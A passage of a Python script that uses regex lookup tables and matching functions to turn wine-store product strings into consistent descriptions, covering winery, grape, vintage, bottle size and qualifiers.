'Clone6' : r'\bClone\s+6\b',
'Crossbarn' : r'\bCross\s+Barn\b',
'Donna' : r'\bDonna',
'Est' : r'\bEstate\b',
'Estate' : r'\bEst\b',
'Gap' : r'\bGap|\s%27Gap',
'Gary' : r'\bGary',
'Julia' : r'\bJulia',
'Knights' : r'\bKnight',
'KistlerVnyd' : r'\bKistler (Vineyard|VYD|EST)\b',
'LP' : r'\bLes Pierres\b',
'Lyn' : r'\bLyndenhur?st\b',
'Mont' : r'\bMonterey\b',
'Mt' : r'\bMount\b|\bMt\.\b',
'Napa/Son' : r'\bNapa.*Son',
'Oak' : r'\bOakville\b',
'One-Pt-5' : r'\bOne\s+Point\s+Five\b',
'Pomm' : r'\bPommeraie\b',
'Priv' : r'\bPrivate\b',
'RR' : r'\bRussian\s+Rivers?\b|RRV',
'RRR' : r'\bRussian\s+Rivers?\b|RRV',
'Res' : r'\bReserve\b|\bRsv\b|\bResrv\b|\bReserv\b|\bReserve$',
'Rose' : r'\bRosé|\bROS&EACUTE;|\bRos%E9',
'Ruth' : r'\bRutherford\b',
'Sandy' : r'\bSandy',
'Samanthas' : r'\bSamantha',
'SC' : r'\bSanta\s+Cruz\b',
'SLD' : r'\bStag.*Leap\b',
'SLH' : r'\bSanta\s+Lucia\b',
'SMV' : r'\bSanta\s+Maria|\bS\s+Maria',
'SRH' : r'\bSTA\.?|\bSANTA\s+Rita\b|\bSTA\sRITA\sHILLS|\bS\s+RITA\b',
'SS' : r'\bSpecial\s+\Selection\b',
'Stage' : r'\bStagecoach\b',
'Son' : r'\bSonoma\b',
'SYV' : r'\bSanta\s+Ynez\s+Valley\b',
'TD9' : r'\bTD\s+9\b|\bTD-9\b',
'Terraces' : r'\bTerrace',
'TheCutrer' : r'\bThe Cutrer\b|nnay Cutrer\b',
'Tok' : r'\bTo[\s\-]?Kolan|\bTo[\s\-]?Kalon',
'Turn4' : r'\bTurn\s+4\b',
'Vernas' : r'\bVerna',
'Vine' : r'\bVines\b',
'Yount' : r'\bYountville\b',
'ZThree' : r'\bZ.*\bThree\b',
'ZCuvee' : r'\bZ.*\bCuvee\b|\bCuvee Z\b',
# misspellings
'Agustina' : r'\bAugustina\b',
'Durell' : r'\bDurrell\b',
'Benchland' : r'\bBenchlands\b',
'Pritchard' : r'\bPitchard\b',
}
# regex search - set the ships as
reShipsAs = re.compile(r'\(ships?\s', re.IGNORECASE)
# the order in which we pull multiple single match attributes
defaultorderlist=[['Tok'], ['Oak'], ['Res'], ['RR'], ['Landslide'], ['Yount'], ['RRR'], ['Son'], ['Ruth'], ['Napa'], ['Helena'], ['SRH'], ['SLH'], ['SMV'], ['SLD'], ['Paso'], ['Alex'], ['Single'], ['Estate']]
### FUNCTIONS ############################################
#########################################################################################
def globalVariableCheck( debug=False ):
# check for liquor definitions that are in noGrapeLookup
# these will never execute
for liquor in liquorLookup:
if liquor in noGrapeLookup:
print('WARNING:liquorLookup regexs will never execute - they are in noGrapeLookup:', liquor)
if liquor in ignoreGrapeLookup:
print('WARNING:liquorLookup regexs will never execute - they are in ignoreGrapeLookup:', liquor)
for winery in ignoreGrapeLookup:
if winery in noGrapeLookup:
print('WARNING:ignoreGrapeLookup regexs will never execute - they are in noGrapeLookup:', winery)
#########################################################################################
def setOptionDictMasterFldValues( optiondict, debug=False ):
# default these fields to the fld values if they are not set
# otherwise leave them alone
for fld in ('fldWine', 'fldWineDescr'):
if not optiondict[fld+'Master']:
optiondict[fld+'Master'] = optiondict[fld]
#########################################################################################
# having a list of names to look at and match on - see if this record has a match
# nameLookup - list of names could have 'None' as the last value, or just the value of None
# lookupStr - string to be searched
# other - array of strings that will have the matching name removed from
# msg - string defining who called this function
#
# returns: string - if a matching string is found
# None - did not find a match
# '' - valid match with "None"
#
def wineLookupByName( nameLookup, lookupStr, other, msg, wineAbbrLookup=None, debug=False ):
# string for debugging messages
funcname = 'wineLookupByName:' + msg + ':'
# debugging
if debug: print(funcname + 'nameLookup:', nameLookup)
# if the value for this winery is None - than there is no additiona work we are done
if nameLookup is None:
# no additional processing
# debugging
if debug: print(funcname + 'match: value is none - continue on')
# return empty string
return ''
# there are additional lookups for this winery - not using grape as part of the description
# check each of the things to look up
for name in nameLookup:
# debugging
if debug: print(funcname + 'match-name:', name)
# special processing of a lookup value of none
if name is None:
# Lookup on none - means just use what we found
# debugging
if debug: print(funcname + 'name-matched: value is none - continue on:pass back blank')
# stop iterating on nameLookup - by returning empty string
return ''
# we have not encountered 'None' - so build the regex based on the text provided
reName = re.compile( r'\b'+name+r'\b', re.IGNORECASE)
# check to see if we have a match with this regex
if reName.search(lookupStr):
# we have a match - so this is the additional attribute we are looking for
# debugging
if debug: print(funcname+'name-MATCHED:', name)
# remove from other if it is in there
for val in other:
if reName.search(val):
other.remove(val)
# debugging
if debug: print(funcname + 'name-remove-from-other:', val)
# stop iterating on nameLookup - return what we found
return name
# 2nd check see if have a translation and this name is translatable
if wineAbbrLookup and name in wineAbbrLookup:
# build the regex with the look up value
reName = re.compile(wineAbbrLookup[name], re.IGNORECASE)
# debugging
if debug: print(funcname + 'Abbr-match-name:', name)
# check to see if we have a match with this regext
if reName.search(lookupStr):
# we have a match - so this is the additional attribute we are looking for
# debugging
if debug: print(funcname+'Abbr-name-MATCHED:', wineAbbrLookup[name])
# remove from other if it is in there
for val in other:
if reName.search(val):
other.remove(val)
# debugging
if debug: print(funcname + 'name-remove-from-other:', val)
# stop iterating on nameLookup - return what we found
return name
# checked all the namelookupd - and did not find any matches
# debuging
if debug: print(funcname + 'name match not found:set to blank')
# return none meaning we did not find a match
return None
#########################################################################################
# find the qualifer like gift, etch, glass tied to this string
#
#
#
# returns: first qualifier or None
#
def findQualifier( wine, debug=False ):
for (val, reSearch) in reQualLookup:
if reSearch.search(wine):
if debug: print('findQualifier:matched-returning:', val)
return val
if debug: print('findQualifier:no-match-returning:', None)
return None
#########################################################################################
# find the winery tied to the rec
#
# Global Variable Used: wineryLookup (an array of regex that define the winery)
#
# returns: (winery, reWinery)
#
def findWinery( rec, lastWinery, lastReWinery, fldWine, debug=False ):
# if we had a prior winery - test for this match first
if lastWinery:
# debugging
if debug:
try:
print('fw:new winery:', rec[fldWine])
except Exception as e:
print('debug error8-continuing:', str(e))
print('rec[fldWine]:type:', type(rec[fldWine]))
# print('fw:new winery:', rec[fldWine].decode('windows-1252'))
print('fw:checking if this is lastWinery:', lastWinery)
# check to see if the winery is a match again for this record
if lastReWinery.search(rec[fldWine]):
# debugging
if debug: print('fw:this matches the last winery')
# match again - return values
return(lastWinery, lastReWinery)
else:
# not match - debugging
if debug: print('fw:not last winery')
# if we did not match lastWinery - lets look through the list
# go through the list of wineries (global variable),
# each row contains wineryName, wineryRegex
# pulling out the tuple from the lookup
for (winery, reWinery) in wineryLookup:
# debugging
if debug: print('fw:not lastWinery-checking winery:', winery)
if fldWine not in rec:
print('not a column in this record fldWine:', fldWine)
print('rec:', rec)
# check to see if this winery is a match
if reWinery.search(rec[fldWine]):
# debugging
if debug: print('fw:winery match found:', winery)
# this is a match - set the variables
return (winery, reWinery)
# for loop ends without a match
# did not find a matching winery in the for loop - clear values
return (None, None)
#########################################################################################
# find the liquor tied to the rec, leveraging the winery
# Global Variable Used: liquorLookup
#
# returns: (liquor, reLiquor)
#
def findLiquor( rec, winery, fldWine, debug=False ):
# go through the list of liquors (global variable), pulling out the tuple from the lookup
for (liquor, reLiquor) in liquorLookup[winery]:
# debugging
if debug: print('fl:checking liquor:', liquor)
# check to see if this liquor is a match
if reLiquor.search(rec[fldWine]):
# debugging
if debug: print('fl:liquor match found:', liquor)
# this is a match - set the variables
return (liquor, reLiquor)
# for loop ends without a match
# did not find a matching liquor in the for loop - clear values
return (None, None)
#########################################################################################
# find the grape tied to the rec by regex evaluation
#
# Global Variable Used: grapeLookup
#
# returns: (grape, reGrape)
#
def findGrapeByRegex( rec, fldWine, debug=False ):
# go through the list of liquors (global variable), pulling out the tuple from the lookup
for (grape, reGrape) in grapeLookup:
# debugging
if debug: print('fgbr:grape:', grape)
# check to see if this liquor is a match
if grape is not None and reGrape.search(rec[fldWine]):
# debugging
if debug: print('fgbr:grape match found:', grape)
# this is a match - set the variables
return (grape, reGrape)
# for loop ends without a match
# did not find a matching grape in the for loop - clear values
return (None, None)
#########################################################################################
# find a string in a field of a record using string match and
# on match, return that it matched and the remainder of the string as an array
#
# returns: (findStr, other)
#
def findStrInRecReturnOther( rec, fldWineDescr, findStr, debug=False ):
# find where in the string this findStr is positioned
matchLoc = rec[fldWineDescr].find(findStr)
# if we found a location
if matchLoc > -1:
# then strip everthing to the left of the findStr value and then split this to create other attributes
other = rec[fldWineDescr][matchLoc+len(findStr)+1:].split()
# debugging
if debug: print('fsirro:findStr matched:', findStr)
if debug: print('fsirro:findStr other:', other)
# return what we found
return (findStr, other)
#no match found - debugging
if debug: print('fsirro:findStr did not match using:', findStr)
# did not find a matching findStr - return that fact
return (None, [])
#########################################################################################
# find the grape tied to the rec and the list of other attributes
# to the right of the grape in that description
#
# Global Variable Used: grapeLookup
#
# returns: (grape, other)
#
def findGrapeByStr( rec, fldWineDescr, debug=False ):
# find the grape and strip everything right of that from the fldWineDescr field
for (grape,reGrape) in grapeLookup:
# debugging
if debug: print('fg:grape:', grape)
# find where in the string this grape is positioned
(grape, other) = findStrInRecReturnOther( rec, fldWineDescr, grape, debug=debug)
# if we have a match return that match
if grape:
return (grape, other)
# did not find a matching grape - return that fact
return (None, [])
#########################################################################################
# find the vintage tied to the rec
#
# Global Variable Used: vintageLookup
#
# returns: vintage
#
def findVintage( rec, fldWine, debug=False ):
# loop through the vintage lookup records
for reVintage in vintageLookup:
# search for match
m = reVintage.search(rec[fldWine])
# if there is a match
if m:
# extract the vlaue from the first regex group with a value
if m.group(1):
vintage = m.group(1)
if debug: print('fv:vintage-match:', reVintage,':group1')
elif m.group(2):
vintage = m.group(2)
if debug: print('fv:vintage-match:', reVintage,':group2')
elif m.group(3):
vintage = m.group(3)
if debug: print('fv:vintage-match:', reVintage,':group3')
else:
vintage = m.group(4)
if debug: print('fv:vintage-match:', reVintage,':group4')
# return what we vound
return vintage
# did not find it
return None
#########################################################################################
# Create the winery/grape-wine-liquour conversion table based on the
# array of records passed in
#
# this routine takes the already read in list of definitions and parses them up
# in order to create a winery-wine-attributes file - that will be used
# later to take new records from searching the internet and properly assign
# an aligned/consistent wine description to that wine string
#
# we expect the wines array to have attributes: fldWineDescr (winedescr), and fldWine (wine_name)
#
# returns: wgLookup - dictionary - which is built from parsing winedescr NOT wine_name
#
# wgLookup[winery][grape] = list of lists of attributes to perform lookups with
#
def buildWineryGrapeLookup( wines, fldWineDescr='winedescr', fldWine='wine', debug=False ):
# local variables
wgLookup = {}
lastWinery = None
lastReWinery = None
# step through the records read in
for rec in wines:
# debugging
if debug: print('bwgl:new rec:', rec[fldWineDescr])
# set the variable
if not fldWineDescr in rec:
print('creating-field:', fldWineDescr)
rec[fldWineDescr] = ''
# local loop variables
winery = grape = wine = liquor = None
other = []
### WINERY
(lastWinery, lastReWinery) = (winery, reWinery) = findWinery( rec, lastWinery, lastReWinery, fldWine, debug=debug )
# if we did not find the winery - skipt this record
if not winery:
# debugging
if debug: print('bwgl:did not find winery-skipping:', rec[fldWine])
# don't process this record - get the next record to process
continue
### IGNOREGRAPE and NOGRAPE and LIQUOR
# if this winery has a noGrapeLookup option - use that to split up the record
if winery in ignoreGrapeLookup:
### BLANK WINE
# don't get the grape for this winery
# set wine to blank
wine = ''
# debugging
if debug: print('bwgl:wine check ignoreGrapeLookup on winery:', winery)
elif winery in noGrapeLookup:
### NO GRAPE WINE -- fldWineDescr
# debugging
if debug: print('bwgl:wine check noGrapeLookup on winery:', winery)
# find which wine is a match from the noGrapeLookup
wine = wineLookupByName( noGrapeLookup[winery], rec[fldWineDescr], [], 'noGrapeLookup', debug=debug )
# not getting a match - we want to continue to have the wine as blank
if False and wine == '':
# debugging
if debug: print('bwgl:nograpelookup:no-match:set wine to None')
wine = None
elif winery in liquorLookup:
### LIQUOR ---- fldWine
# debugging
if debug: print('bwgl:liquor check on winery:', winery)
# see if a liquor matches
(liquor, reLiquor) = findLiquor( rec, winery, fldWine, debug=debug )
# if we found match - populate wine so we don't look for grape
if liquor is not None:
wine = liquor
# debugging
if debug: print('bwgl:liquor found and put in wine:', wine)
### GRAPE (if we have not filled in wine) --- fldWineDescr
if wine is None:
# debugging
if debug: print('bwgl:grape check because wine is None')
# determine if there is a grape in this string
# if ther
(grape,other) = findGrapeByStr( rec, fldWineDescr )
# debugging
if debug: print('bwgl:grape:', grape, ':other:', other)
else:
# debugging
if debug: print('bwgl:grape check skipped - we have a wine')
### Skip this record if we don't have a wine or a grape
if wine is None and grape is None:
# debugging
if debug: print('bwgl:record skipped - no grape or wine defined')
continue
### OTHER (if not already created by grape lookup) ---- fldWineDescr
#
# if we did not find the grape in the string
# so other was not populated
# we need to look up other using 'winery' as the filter
if grape is None:
# debugging
if debug: print('bwgl:build other from winery')
# find where in the string this grape is positioned
(wineryFind, other) = findStrInRecReturnOther( rec, fldWineDescr, winery, debug=debug)
### OTHER Additional Processing
# remove CASE - the keyword case if it exists
if 'case' in other:
other.remove('case')
# debugging
if debug: print('bwgl:remove case from other')
# remove VINTAGE and/or BOTTLESIZE and/or other QUALIFIERS
# the last element will either be the vintage (no bottle size)
# or will be the bottle size and then next is the vintage
# if the last position is not vintage, attempt to remove the bottle size
# then remove vintage - this should be the vintage (validated by isdigit lookup)
if other:
if debug: print('bwgl:looking at other for quals, bottlesize and vintage')
# remove qualifiers if exist
if not other[-1].isdigit():
# first we check to see if there is a qualifier appended
# we are not vintage as the position posiition - see if it is size
for qual,reQual in reQualLookup:
if qual == other[-1]:
if debug: print('bwgl:remove qualifier from other:', qual)
del other[-1]
break
# remove bottle size if exist
if other and not other[-1].isdigit():
# we are not vintage as the position posiition - see if it is size
for size,reSize in sizeLookup:
if size == other[-1]:
if debug: print('bwgl:remove bottlesize from other:', size)
del other[-1]
break
# remove vintage if it is there
if other and other[-1].isdigit():
# first check to see if this is part of the ignore grape solution
if winery in ignoreGrapeLookup and ignoreGrapeLookup[winery]and other[-1] in ignoreGrapeLookup[winery]:
if debug: print('bwgl:value is in ignoreLookupGrape - keeping it:', other[-1])
else:
# debugging
if debug: print('bwgl:remove vintage from other:', other[-1])
del other[-1]
# remove WINE - the element if the element is the same as the wine
if wine and wine in other:
other.remove(wine)
# debugging
if debug: print('bwgl:remove wine from other:', wine)
# debugging
if debug:
try:
print('bwgl:Final-Build:', winery, ':', grape, ':', wine, ':', liquor, ':', other, ':', rec[fldWineDescr], ':', rec[fldWine])
except Exception as e:
print('debug error2-continuing:', str(e))
print('fldWine:', fldWine)
### BUILD LOOKUP FOR CONVERSION (we use the grape attribute to build the dictionary)
# move liquor value into grape because we did not find the
if grape is None and wine is not None:
grape = wine
# debugging
if debug: print('bwgl:set-grape-to-wine:', grape)
### WINERY:GRAPE-WINE-LIQOUR Dictionary creation
# debugging
if debug: print('bwgl:create wgLookup for winery:', winery, ':grape:', grape)
# validate we have an entry for this winery in the lookup dict
if winery not in wgLookup:
# one does not create - so create a stub for winery:grape
wgLookup[winery] = { grape : [] }
else:
# one DOES exist - check to see if the grape is already here
if grape not in wgLookup[winery]:
# grape is not here - so create an empty list to stuff values into
wgLookup[winery][grape] = []
# check to see if we have OTHER attributes
# and if we do - check to see that this list of attributes
# is not already in the wineLookup array
# and if this list does not exist - then append this list
if other and other not in wgLookup[winery][grape]:
# add this list of other to this entry
wgLookup[winery][grape].append(other)
# debugging
if debug: print('bwgl:appending to wgLookup:other:', other)
# end loop on wines
### SORTED WINERY:GRAPE lookup - most optional attributes first in the list
# debbuging
if debug: print('bwgl:complete-read-of-master-file:sort wgLookup')
# now sort the list of lookups from most specific (greatest number of attributes) to least
for winery in wgLookup:
for grape in wgLookup[winery]:
wgLookup[winery][grape] = sorted(wgLookup[winery][grape], key=len, reverse=True)
# debugging
if debug:
print('\n'*5)
print('START WGLOOKUP DUMPED')
print('#'*80)
if ppFlag:
pp.pprint(wgLookup)
else:
print('bwgl:final-wgLookup:\n', wgLookup)
print('#'*80)
# done with for loop - return the lookup
return wgLookup
#########################################################################################
# find the matching set of additional attributes that match this record
# from the global lookup.
#
# we assume that we have already tested that winery and value exist in wgLookup prior to calling this routine
#
# the special paramaters here are:
# value - this is either "wine" or "grape" - this routine allows you to lookup on different attributes
# valueDescr - passed in string for debugging telling us which value was passed in
#
# defaultorderlist = array of array of string - gives the default order of singlematch looks to determine which of
# many matches is the one we will select
#
# Global Variable Used: wgLookup
#
# returns: valuematchset array selected
#
def findAddAttribWgLookup( rec, winery, value, fldWine, AbbrLookup=[], defaultorderlist=None, valueDescr='', debug=False ):
# local variable - capture all the entries that are single match entries
singlematch=[]
# debugging
if debug:
try:
print('faawl:value:', valueDescr, ':match-wgLookup:', rec[fldWine], ':', wgLookup[winery][value])
except Exception as e:
print('debug error7-continuing:', str(e))
print('fldWine:', fldWine)
# for each set of values that could be a match
for valuematchset in wgLookup[winery][value]:
# debugging
if debug: print('faawl:testing valuematchset:', valuematchset, ':length:', len(valuematchset))
# set the flag to start
allmatch = True
# loop through the set of values that make up this set
for valuematch in valuematchset:
# for each entry - build a regex and test it and add it up
# we need all values in this valueset to be true for this valueset to be match
reMatch1 = re.compile(r'\b'+valuematch+r'\b', re.IGNORECASE)
reMatch2 = re.compile(r'\s'+valuematch+r'\s', re.IGNORECASE)
# check to see if this regex is a match
m1 = reMatch1.search(rec[fldWine])
m2 = reMatch2.search(rec[fldWine])
if m1 or m2:
# this regex is a match
allmatch = True and allmatch
elif valuematch in AbbrLookup:
# this regex was not a match - but we want to check if the value also has
# a translation - and if it has a translation - then we test the translation also
# the value did not work but there is an alternate value to check
# debugging
if debug: print('faawl:valuematch-abbr:', valuematch, ':', wineAbbrLookup[valuematch])
# create the regex
reMatch = re.compile(wineAbbrLookup[valuematch], re.IGNORECASE)
# test the regex and attach the results to allmatch
allmatch = reMatch.search(rec[fldWine]) and allmatch
else:
# not a match - update allmatch
allmatch = False and allmatch
# debugging
if debug: print('faawl:valuematch:', valuematch, ':allmatch:', allmatch)
# check to see if all matched
if allmatch:
# all matched - so this is a match - so break out of the valuematchset group
# debugging
if debug: print('faawl:value matched:', valuematchset)
# different action based on # of items being match
if len(valuematchset) == 1:
# debugging
if debug: print('faawl:single-valuematch-set-added-to-singlematch:', valuematchset)
# single value matching - we don't stop when we find a match
singlematch.append(valuematchset)
else:
# debugging
if debug: print('faawl:multivalue-valuematch-set-found:done')
# multi value match so we are done when we find a match - so return
return valuematchset
# did not find matchset in the for loop - check to see if we have singlematch
if not singlematch:
# debugging
if debug: print('faawl:exit with singlematch NOT populated return blank')
# did not have singlematch found - we are done - return empty
return []
# singlematch populated
# debugging
if debug: print('faawl:exit with singlematch populated:', singlematch)
# check to see how many matches we got
if len(singlematch) == 1 or not defaultorderlist:
# debugging
if debug: print('faawl:return first entry in singlematch:', singlematch[0])
# if there is only one entry in here
# or we don't have a default order so we pick the first found
# and we set the value to this
return singlematch[0]
# we need to define which of the singlematch values we will return
# the defaultorderlist will be used to set that ordering
#
# create a local copy of the list that can be changed in this routine
defaultorder = defaultorderlist[:]
# multiple singlematch values so lets find and pick the best one
# debugging
if debug: print('faawl:multiple single match value-singlematch:', singlematch)
# get the values from singlematch that are not in defaultorder
# and put them at the start of defaultorder list
# go in reverse order when doing this lookup
for val in singlematch[::-1]:
if val not in defaultorder:
defaultorder.insert(0,val)
### HARDCODED ###
# very short term fix - we need to prioritze these single tags (mondavi problem)
if winery == 'Mondavi' and ['Tok'] in singlematch:
if debug: print('faawl:Change from:', valuematchset, ':to Tok for mondavi')
return ['Tok']
# find the first matching value from priority order list
for val in defaultorder:
if val in singlematch:
# debugging
if debug: print('faawl:selected-singlematch-value:', val)
# we found the first match - set it and break out
return val
# debugging
if debug: print('faawl:valuematchset-empty')
# did not match - return empty
return []
#########################################################################################
# create a consistent wine name for a list or records with store based wine descriptions
#
# the special paramaters here are:
# wgLookup - dictionary of winery, wine, list of wines
# wines - list of records to be processed
#
# Global Variable Used: ignoreGrapeLookup, noGrapeLookup, wineAbbrLookup, liquorLookup
# reCase, sizeLookup
#
# returns: [updated values in teh wines array]
#
#### Use the winery/grape-wine-liquour conversion table to define a wine description for the records
def setWineryDescrFromWineryGrapeLookup( wgLookup, wines, fldWineDescr = 'winedescr', fldWine = 'wine', fldWineDescrNew = 'winedescrnew', fldWineDescrMatch=False, debug=False ):
if debug:
print('\n'*10,'START WINEDESCR SETTING HERE ---------------------------------------------')
# step through all the records passed in
for rec in wines:
# local variables
winery = grape = wine = vintage = case = size = liquor = nongrape = qual = None
winematchset = grapematchset = []
# debugging
if debug:
try:
print('setWinery:fldWine:', rec[fldWine])
except Exception as e:
print('debug error2-continuing:', str(e))
print('fldWine:', fldWine)
# make the field if it does not exist
if fldWineDescrNew not in rec:
rec[fldWineDescrNew] = rec[fldWineDescr]
### WINERY
(winery, reWinery) = findWinery( rec, None, None, fldWine, debug=debug )
# validate the winery
if winery is None:
### WINERY NONE - go to next record
# debugging
if debug: print('setWinery:winery not found-next record:' + rec[fldWine])
# get the next record
continue
elif winery not in wgLookup:
### WINERY NOT IN LOOKUP
# skip this record - nothing to process
# debugging
if debug: print('setWinery:winery not in wgLookup:', winery)
continue
### GRAPE
# find the grape that is this record
(grape, reGrape) = findGrapeByRegex( rec, fldWine, debug=debug )
# debugging
if debug: print('setWinery:grape found:', grape)
### OVERRIDES
if winery in ignoreGrapeLookup:
### IGNORE GRAPE
# debugging
if debug: print('setWinery:winery-match-ignoreGrape:clear-wine:set-grape-to-None:set-nongrape-True:winery:', winery)
# clear wine and grape
wine = ''
# clear the grape field
grape = None
# set the liquor flag to control processing
nongrape = True
if winery in noGrapeLookup:
### NOGRAPE - WINE
# debugging
if debug: print('setWinery:noGrapeLookup wine check:', winery)
# do the lookup and if a search is a match on None take appropriate action
wine = wineLookupByName( noGrapeLookup[winery], rec[fldWine], [], 'noGrapeLookup', wineAbbrLookup, debug=debug )
# debugging
if debug: print('setWinery:nogrape check:wine:', wine)
# test the value we got back
if wine == '':
# debugging
if debug: print('setWinery:noGrapeLookup:matched:None::clear grape:set nongrape to True')
# the lookup match None - so we want to ignore any grape found and we blank out the wine
grape = None
wine = ''
nongrape = True
elif wine:
# matched a wine - so clear the grape value
grape = None
# debugging
if debug: print('setWinery:nograpeLookup:wine found - clear grape field')
if wine is None and winery in liquorLookup:
### LIQUOR
# debugging
if debug: print('setWinery:liqourLookup:', winery)
(liquor, reLiquor) = findLiquor( rec, winery, fldWine, debug=debug)
# if we found something update wine to be what we found
if liquor is not None:
wine = liquor
# debugging
if debug: print('setWinery:liquorLookup-match:', liquor)
if not grape and not nongrape and not wine and liquor is None:
# NO GRAPE - and not connected to noGrapeLookup or liquorLookkup
# get the next record
# debugging
if debug: print('setWinery:did not find grape-skipping record:', rec[fldWineDescr])
continue
# debugging
if debug: print('setWinery:pre-vintage found values for wine/liquor:', wine, ':grape:', grape)
### VINTAGE
vintage = findVintage( rec, fldWine, debug=debug )
# debugging
if debug: print('setWinery:vintage:', vintage)
### CASE information
if reCase.search(rec[fldWine]):
case = 'case'
### BOTTLE SIZE - get the size information
for (size, reSize) in sizeLookup:
# debugging
if debug: print('setWinery:sizeLookup:',size)
if reSize.search(rec[fldWine]) and not reShipsAs.search(rec[fldWine]):
# debugging
if debug: print('setWinery:sizeLookup:matched:',reSize)
break
else:
size = None
if debug: print('setWinery:sizeLookup:None-found')
### QUAL for this wine
qual = findQualifier(rec[fldWine], debug=debug)
# debugging
if debug:
try:
print('setWinery:FinalAttributes:', winery, ':', grape, ':', wine, ':', liquor, ':', vintage, ':', case, ':', size, ':', qual, ':', rec[fldWine])
except Exception as e:
print('debug error5-continuing:', str(e))
print('fldWine:', fldWine)
### WINE - ADDITIONAL INFORMATION
if liquor is not None:
# debugging
if debug: print('setWinery:liquor flag set - no additional data needs to be collected')
elif wine is not None:
# debugging
if debug: print('setWinery:wine is not None - do additional lookups:wine:', wine)
# we found a wine / liquor - so see if there are additional attributes
if wine in wgLookup[winery] and wgLookup[winery][wine]:
# debugging
if debug: print('setWinery:lookup winematchset')
# there is one or more additional lookups for this winery/wine
winematchset = findAddAttribWgLookup( rec, winery, wine, fldWine, wineAbbrLookup, None, valueDescr='wine', debug=debug )
else:
# wine not in wgLookup so thing to work
print('setWinery:unable to perform wgLookup on winery:', winery, ':wine:', wine, ':rec-wine:', rec[fldWine])
# debugging
if debug:
try:
print('wgLookup[winery]:', wgLookup[winery])
except Exception as e:
print('debug error3-continuing:', str(e))
print('winery:', winery)
# debugging - wine is not None - what is the final winematchset
if debug: print('setWinery:winematchset:', winematchset)
elif grape is not None:
# debugging
if debug: print('setWinery:grape is not None - do additional lookups:', grape)
# grape was returned (not wine) so do the lookup on grape
if grape in wgLookup[winery] and wgLookup[winery][grape]:
# see if we can create a match based on attributes and the grape
grapematchset = findAddAttribWgLookup( rec, winery, grape, fldWine, wineAbbrLookup, defaultorderlist, valueDescr='grape', debug=debug )
elif grape in wgLookup[winery]:
# do nothing this is a empty set
if debug: print('setWinery:grape match: matching record set is blank - no action required')
else:
# wine not in wgLookup so thing to work
# debugging
print('setWinery:grape NONMATCH:', rec[fldWine])
if debug: print('setWinery:liquor:', liquor, ':wine:', wine, ':grape:', grape, ':wgLookup[winery]:', wgLookup[winery])
# debugging - wine is not None - what is the final grapematchset
if debug: print('setWinery:grapematchset:', grapematchset)
### check the matchsets we got back - if any of them look like vintage values
### remove them from the string and look at up vintage again
if vintage:
newVintageLookupWine = rec[fldWine]
for matchvalue in winematchset:
if vintage in matchvalue:
newVintageLookupWine = newVintageLookupWine.replace(matchvalue,'')
if debug: print('setWinery:2nd-vintage:winematchset:wine-name-removal:', matchvalue)
for matchvalue in grapematchset:
if vintage in matchvalue:
newVintageLookupWine = newVintageLookupWine.replace(matchvalue,'')
if debug: print('setWinery:2nd-vintage:grapematchset:wine-name-removal:', matchvalue)
if newVintageLookupWine != rec[fldWine]:
if debug: print('setWinery:2nd-vintage:newVintageLookupWine:', newVintageLookupWine)
newVintage = findVintage( { fldWine : newVintageLookupWine}, fldWine, debug=debug )
if debug: print('setWinery:2nd-vintage:newVintage:', newVintage)
vintage = newVintage
### FINAL WINEDESCR
# create initial value
wineDescr = ''
# if winery starts with a z then we don't have a vintage
if winery.startswith('z'):
vintage = None
# debugging
if debug: print('setWinery:winery starts with z: clear vintage')
# quick test - does the wine and the winematchset the same
if winematchset and ' '.join(winematchset) in wine:
#debugging
if debug: print('setWinery:clearing-winematchset:', winematchset,':is-in-wine:', wine)
winematchset = []
if grapematchset and ' '.join(grapematchset) in grape:
#TODO - work around for single letter matches
if not (len(grapematchset)==1 and len(grapematchset[0])==1):
#debugging
if debug: print('setWinery:clearing-grapematchset:',grapematchset,':is-in-grape:', grape)
grapematchset = []
if grapematchset and size and size in ' '.join(grapematchset):
size = ''
if winematchset and size and size in ' '.join(winematchset):
size = ''
if debug:
print('setWinery:vallist1:', [winery, grape, wine] + grapematchset + winematchset + [vintage, size, qual, case])
print('setWinery:vallist2:', [winery, grape, wine, *grapematchset, *winematchset, vintage, size, qual, case])
# create a list
wdList= []
# step through the values
for val in [winery, grape, wine] + grapematchset + winematchset + [vintage, size, qual, case]:
# and if there is a value add to the list - otherwise skip
if val: wdList.append(val)
# build the wine description by joining all these values together
wineDescr = ' '.join(wdList)
# debugging
if False:
if debug: print('setWinery:wdList:', wdList)
if debug: print('setWinery:wineDescr:', wineDescr)
# debugging
if debug:
try:
print(':'.join(['setWinery:wineDescrList', wineDescr, rec[fldWineDescr], str(wineDescr==rec[fldWineDescr]), rec[fldWine]]) )
except Exception as e:
print('debug error6-continuing:', str(e))
print('fldWine:', fldWine)
# fill thew new value into the array
rec[fldWineDescrNew] = wineDescr
# fill in the matching field
if fldWineDescrMatch:
rec[fldWineDescrMatch] = (rec[fldWineDescr] == rec[fldWineDescrNew])
#########################################################################################
# set any digit only field to the word passed
def setDigitFld2Value( wines, fld, value, debug=False ):
for rec in wines:
if rec[fld].isdigit():
rec[fld] = value
#########################################################################################
# validate the field settings match the file we read in for update
def updateFileOptionDictCheck( optiondict, wines, header, debug=False ):
# check to see if the description field is in the file we read in
if optiondict['fldWineDescr'] not in wines[0]:
if debug: print('updateFileOptionDictCheck:fldWineDescr NOT in file read in:', optiondict['fldWineDescr'])
# field needed is not in the record - see if we know what to do
if 'cnt' in wines[0]:
# the cnt field is in the file - so set to that structure
# we will put the updated values into the 'cnt' field
print('setting values fldWineDescr and fldWineDescrNew to: cnt')
# change the field we are updating
optiondict['fldWineDescr'] = optiondict['fldWineDescrNew'] = 'cnt'
elif 'winedescr' in wines[0]:
# the WineDescr field is in the file - so set to that structure
print('setting values fldWineDescr to winedescr and fldWineDescrNew to winedescrnew')
# change the field we are updating
optiondict['fldWineDescr'] = 'winedescr'
optiondict['fldWineDescrNew'] = 'winedescrnew'
else:
# no idea - we need to error out
print('could not find fldWineDescr in wines[0]-aborting:', optiondict['fldWineDescr'], '\nwines[0]:', wines[0])
# force the error
error = wines[0][optiondict['fldWineDescr']]
# determine if we should create the match column (may want ot remove this section later)
# removed this logic - require the person to set this field - we will not set it for them.
if False and optiondict['fldWineDescr'] == 'winedescr':
# we are using the file format that is the xref file
# so check to see if we have match enabled
if not optiondict['fldWineDescrMatch']:
# create the default value
optiondict['fldWineDescrMatch'] = 'same'
# provide message
print('setting value fldWineDescrMatch to: same')
# check to see if the input file is the same as the output file
if optiondict['csvfile_update_in'] == optiondict['csvfile_update_out']:
# they are the same file (in and out) - so we need to move the input file to a backup location
